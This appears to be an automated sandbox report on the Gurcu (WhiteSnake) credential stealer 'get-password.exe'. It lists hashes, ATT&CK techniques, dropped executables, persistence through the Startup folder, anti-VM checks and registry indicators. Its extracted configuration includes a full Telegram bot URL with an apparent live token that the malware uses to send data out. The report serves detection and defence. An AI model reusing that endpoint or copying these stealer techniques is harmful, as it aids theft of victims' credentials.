gurcu | 794693da4c93431e60e51d4c22f3879c468e2b12fe080493a8cc632d5952c6bb

Resubmissions

10-08-2024 16:31

240810-t1c9eaxfpq 10

Analysis

max time kernel
1199s
max time network
1200s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10-08-2024 16:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

get-password.exe
Size

11.5MB
MD5

414ae240ce50f7ed37714f9264d1c557
SHA1

2e4651b9c8253b68d757c88d1b139386bbc6cb23
SHA256

794693da4c93431e60e51d4c22f3879c468e2b12fe080493a8cc632d5952c6bb
SHA512

0942f035778a0918791c9d6b47a8ef642230852347ffa5183c3fb9027316773606090d896d528ca348a3e779311b7d14068fe45f37ad663a9c70aa93207cbe86
SSDEEP

196608:ExSZuZxvCuenVet4Nu0Tzz0QADnq/bQA1HeT39IigleE9TFa0Z8DOjCdylVSEhkd:EEZQvCuenVet4Nu0TUYp1+TtIiHY9Z81

Score

10^/10

gurcu collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller spyware stealer upx

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7218546936:AAFrPCwTCyKvi4LhLZdCP0VjlBN8TXokowk/sendDocumen

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
6604	powershell.exe
7608	powershell.exe
7112	powershell.exe
5176	powershell.exe
1528	powershell.exe
4968	powershell.exe
4532	powershell.exe
6428	powershell.exe
2360	powershell.exe
5816	powershell.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

get-password.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools get-password.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools	get-password.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

crack.execrack.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	crack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	crack.exe

Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
collection

Clipboard Data
T1115

Processes:

powershell.exepowershell.execmd.execmd.exe

pid process

7284 powershell.exe
8144 powershell.exe
840 cmd.exe
6472 cmd.exe

pid	process
7284	powershell.exe
8144	powershell.exe
840	cmd.exe
6472	cmd.exe

Drops startup file 2 IoCs

Processes:

Payload.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.exe	Payload.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.exe	Payload.exe

Executes dropped EXE 20 IoCs

Processes:

trsfsdfr.exetrsfsdfr.exeAura_protected.execrack.exePayload.execrack.execrack.exeAura_protected.exerar.execrack.exePayload.execrack.execrack.exerar.exeAura_protected.exeGather Proxy.exeKidux Proxy Scraper v1.0.2.exeuProxy Tool.exeNetflix Checker v0.2.1.exeSQLi Dumper.exe

pid	process
5072	trsfsdfr.exe
4368	trsfsdfr.exe
6060	Aura_protected.exe
6456	crack.exe
1404	Payload.exe
4144	crack.exe
6756	crack.exe
6724	Aura_protected.exe
7952	rar.exe
4756	crack.exe
6332	Payload.exe
7888	crack.exe
8104	crack.exe
8064	rar.exe
2272	Aura_protected.exe
1524	Gather Proxy.exe
3676	Kidux Proxy Scraper v1.0.2.exe
6672	uProxy Tool.exe
7260	Netflix Checker v0.2.1.exe
6204	SQLi Dumper.exe

Loads dropped DLL 47 IoCs

Processes:

trsfsdfr.execrack.execrack.exeGather Proxy.exe

pid	process
4368	trsfsdfr.exe
4368	trsfsdfr.exe
4368	trsfsdfr.exe
4368	trsfsdfr.exe
4368	trsfsdfr.exe
4368	trsfsdfr.exe
4368	trsfsdfr.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
6756	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
8104	crack.exe
1524	Gather Proxy.exe
1524	Gather Proxy.exe
1524	Gather Proxy.exe
1524	Gather Proxy.exe
1524	Gather Proxy.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/6756-2747-0x00007FFF468A0000-0x00007FFF46F78000-memory.dmp	upx
behavioral1/memory/6756-2749-0x00007FFF6B800000-0x00007FFF6B80F000-memory.dmp	upx
behavioral1/memory/6756-2748-0x00007FFF6B770000-0x00007FFF6B795000-memory.dmp	upx
behavioral1/memory/6756-2756-0x00007FFF63240000-0x00007FFF6326D000-memory.dmp	upx
behavioral1/memory/6756-2758-0x00007FFF619E0000-0x00007FFF61A04000-memory.dmp	upx
behavioral1/memory/6756-2757-0x00007FFF63E10000-0x00007FFF63E29000-memory.dmp	upx
behavioral1/memory/6756-2759-0x00007FFF53A70000-0x00007FFF53BE6000-memory.dmp	upx
behavioral1/memory/6756-2764-0x00007FFF533C0000-0x00007FFF5348D000-memory.dmp	upx
behavioral1/memory/6756-2765-0x00007FFF46370000-0x00007FFF46892000-memory.dmp	upx
behavioral1/memory/6756-2762-0x00007FFF5F160000-0x00007FFF5F193000-memory.dmp	upx
behavioral1/memory/6756-2767-0x00007FFF6B640000-0x00007FFF6B64D000-memory.dmp	upx
behavioral1/memory/6756-2766-0x00007FFF62A60000-0x00007FFF62A74000-memory.dmp	upx
behavioral1/memory/6756-2771-0x00007FFF52780000-0x00007FFF5289B000-memory.dmp	upx
behavioral1/memory/6756-2770-0x00007FFF468A0000-0x00007FFF46F78000-memory.dmp	upx
behavioral1/memory/6756-2761-0x00007FFF6B700000-0x00007FFF6B70D000-memory.dmp	upx
behavioral1/memory/6756-2760-0x00007FFF63860000-0x00007FFF63879000-memory.dmp	upx
behavioral1/memory/6756-2979-0x00007FFF6B770000-0x00007FFF6B795000-memory.dmp	upx
behavioral1/memory/6756-2990-0x00007FFF533C0000-0x00007FFF5348D000-memory.dmp	upx
behavioral1/memory/6756-2980-0x00007FFF468A0000-0x00007FFF46F78000-memory.dmp	upx
behavioral1/memory/6756-2989-0x00007FFF5F160000-0x00007FFF5F193000-memory.dmp	upx
behavioral1/memory/6756-2991-0x00007FFF46370000-0x00007FFF46892000-memory.dmp	upx
behavioral1/memory/6756-2986-0x00007FFF53A70000-0x00007FFF53BE6000-memory.dmp	upx
behavioral1/memory/6756-2985-0x00007FFF619E0000-0x00007FFF61A04000-memory.dmp	upx
behavioral1/memory/6756-3036-0x00007FFF6B700000-0x00007FFF6B70D000-memory.dmp	upx
behavioral1/memory/6756-3037-0x00007FFF46370000-0x00007FFF46892000-memory.dmp	upx
behavioral1/memory/6756-3035-0x00007FFF63860000-0x00007FFF63879000-memory.dmp	upx
behavioral1/memory/6756-3034-0x00007FFF53A70000-0x00007FFF53BE6000-memory.dmp	upx
behavioral1/memory/6756-3033-0x00007FFF619E0000-0x00007FFF61A04000-memory.dmp	upx
behavioral1/memory/6756-3032-0x00007FFF63E10000-0x00007FFF63E29000-memory.dmp	upx
behavioral1/memory/6756-3031-0x00007FFF63240000-0x00007FFF6326D000-memory.dmp	upx
behavioral1/memory/6756-3030-0x00007FFF6B800000-0x00007FFF6B80F000-memory.dmp	upx
behavioral1/memory/6756-3029-0x00007FFF6B770000-0x00007FFF6B795000-memory.dmp	upx
behavioral1/memory/6756-3028-0x00007FFF533C0000-0x00007FFF5348D000-memory.dmp	upx
behavioral1/memory/6756-3027-0x00007FFF52780000-0x00007FFF5289B000-memory.dmp	upx
behavioral1/memory/6756-3026-0x00007FFF6B640000-0x00007FFF6B64D000-memory.dmp	upx
behavioral1/memory/6756-3025-0x00007FFF62A60000-0x00007FFF62A74000-memory.dmp	upx
behavioral1/memory/6756-3022-0x00007FFF5F160000-0x00007FFF5F193000-memory.dmp	upx
behavioral1/memory/6756-3013-0x00007FFF468A0000-0x00007FFF46F78000-memory.dmp	upx
behavioral1/memory/8104-4608-0x00007FFF468A0000-0x00007FFF46F78000-memory.dmp	upx
behavioral1/memory/8104-4611-0x00007FFF67B20000-0x00007FFF67B2F000-memory.dmp	upx
behavioral1/memory/8104-4610-0x00007FFF63A20000-0x00007FFF63A45000-memory.dmp	upx
behavioral1/memory/8104-4619-0x00007FFF63240000-0x00007FFF6326D000-memory.dmp	upx
behavioral1/memory/8104-4622-0x00007FFF4D4F0000-0x00007FFF4D666000-memory.dmp	upx
behavioral1/memory/8104-4621-0x00007FFF63080000-0x00007FFF630A4000-memory.dmp	upx
behavioral1/memory/8104-4620-0x00007FFF63860000-0x00007FFF63879000-memory.dmp	upx
behavioral1/memory/8104-4624-0x00007FFF63FD0000-0x00007FFF63FDD000-memory.dmp	upx
behavioral1/memory/8104-4627-0x00007FFF50030000-0x00007FFF500FD000-memory.dmp	upx
behavioral1/memory/8104-4626-0x00007FFF46370000-0x00007FFF46892000-memory.dmp	upx
behavioral1/memory/8104-4625-0x00007FFF5E6F0000-0x00007FFF5E723000-memory.dmp	upx
behavioral1/memory/8104-4623-0x00007FFF62A60000-0x00007FFF62A79000-memory.dmp	upx
behavioral1/memory/8104-4633-0x00007FFF4D3D0000-0x00007FFF4D4EB000-memory.dmp	upx
behavioral1/memory/8104-4632-0x00007FFF63BD0000-0x00007FFF63BDD000-memory.dmp	upx
behavioral1/memory/8104-4631-0x00007FFF468A0000-0x00007FFF46F78000-memory.dmp	upx
behavioral1/memory/8104-4628-0x00007FFF619F0000-0x00007FFF61A04000-memory.dmp	upx
behavioral1/memory/8104-4812-0x00007FFF63A20000-0x00007FFF63A45000-memory.dmp	upx
behavioral1/memory/8104-4838-0x00007FFF4D4F0000-0x00007FFF4D666000-memory.dmp	upx
behavioral1/memory/8104-4842-0x00007FFF63080000-0x00007FFF630A4000-memory.dmp	upx
behavioral1/memory/8104-4854-0x00007FFF50030000-0x00007FFF500FD000-memory.dmp	upx
behavioral1/memory/8104-4853-0x00007FFF46370000-0x00007FFF46892000-memory.dmp	upx
behavioral1/memory/8104-4843-0x00007FFF468A0000-0x00007FFF46F78000-memory.dmp	upx
behavioral1/memory/8104-4852-0x00007FFF5E6F0000-0x00007FFF5E723000-memory.dmp	upx
behavioral1/memory/8104-4844-0x00007FFF63A20000-0x00007FFF63A45000-memory.dmp	upx
behavioral1/memory/8104-4858-0x00007FFF468A0000-0x00007FFF46F78000-memory.dmp	upx
behavioral1/memory/8104-4880-0x00007FFF50030000-0x00007FFF500FD000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

Processes:

SQLi Dumper.exe

description	ioc	process
File opened for modification	C:\Windows\assembly\Desktop.ini	SQLi Dumper.exe
File created	C:\Windows\assembly\Desktop.ini	SQLi Dumper.exe

Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

get-password.exe

description ioc process

File opened (read-only) \??\F: get-password.exe
File opened (read-only) \??\D: get-password.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

1009 discord.com
1010 discord.com
1898 pastebin.com
1912 pastebin.com
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

25 ipinfo.io
44 ipinfo.io
962 ip-api.com
1682 ip-api.com
1831 ipaddress.com
21 ipinfo.io
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates processes with tasklist 1 TTPs 6 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

6500 tasklist.exe
7396 tasklist.exe
6376 tasklist.exe
6500 tasklist.exe
3196 tasklist.exe
3636 tasklist.exe
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

get-password.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN get-password.exe

description	ioc	process
File opened (read-only)	\??\F:	get-password.exe
File opened (read-only)	\??\D:	get-password.exe

flow	ioc
1009	discord.com
1010	discord.com
1898	pastebin.com
1912	pastebin.com

flow	ioc
25	ipinfo.io
44	ipinfo.io
962	ip-api.com
1682	ip-api.com
1831	ipaddress.com
21	ipinfo.io

pid	process
6500	tasklist.exe
7396	tasklist.exe
6376	tasklist.exe
6500	tasklist.exe
3196	tasklist.exe
3636	tasklist.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	get-password.exe

Drops file in Windows directory 3 IoCs

Processes:

SQLi Dumper.exe

description	ioc	process
File created	C:\Windows\assembly\Desktop.ini	SQLi Dumper.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	SQLi Dumper.exe
File opened for modification	C:\Windows\assembly	SQLi Dumper.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\trsfsdfr.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Aura_protected.exeSQLi Dumper.exepowershell.exeAura_protected.execrack.exepowershell.exeAura_protected.execrack.exeGather Proxy.exeKidux Proxy Scraper v1.0.2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Aura_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SQLi Dumper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Aura_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Aura_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gather Proxy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Kidux Proxy Scraper v1.0.2.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

netsh.execmd.exenetsh.execmd.exe

pid process

7492 netsh.exe
7996 cmd.exe
8112 netsh.exe
6888 cmd.exe

pid	process
7492	netsh.exe
7996	cmd.exe
8112	netsh.exe
6888	cmd.exe

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exedw20.exefirefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe

Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exe

pid process

6492 WMIC.exe
8112 WMIC.exe

pid	process
6492	WMIC.exe
8112	WMIC.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exedw20.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

7580 systeminfo.exe
7612 systeminfo.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1412 taskkill.exe

pid	process
7580	systeminfo.exe
7612	systeminfo.exe

pid	process
1412	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

SQLi Dumper.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Internet Explorer\TypedURLs	SQLi Dumper.exe

Modifies registry class 64 IoCs

Processes:

Aura_protected.exeAura_protected.exemsedge.exefirefox.exeOpenWith.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "6"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\0\NodeSlot = "9"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Aura_protected.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	Aura_protected.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Aura_protected.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2392887640-1187051047-2909758433-1000\{63497ED1-1256-4312-A5E7-1AE26EB006D1}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\0\MRUListEx = ffffffff	Aura_protected.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic"	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	Aura_protected.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Aura_protected.exe
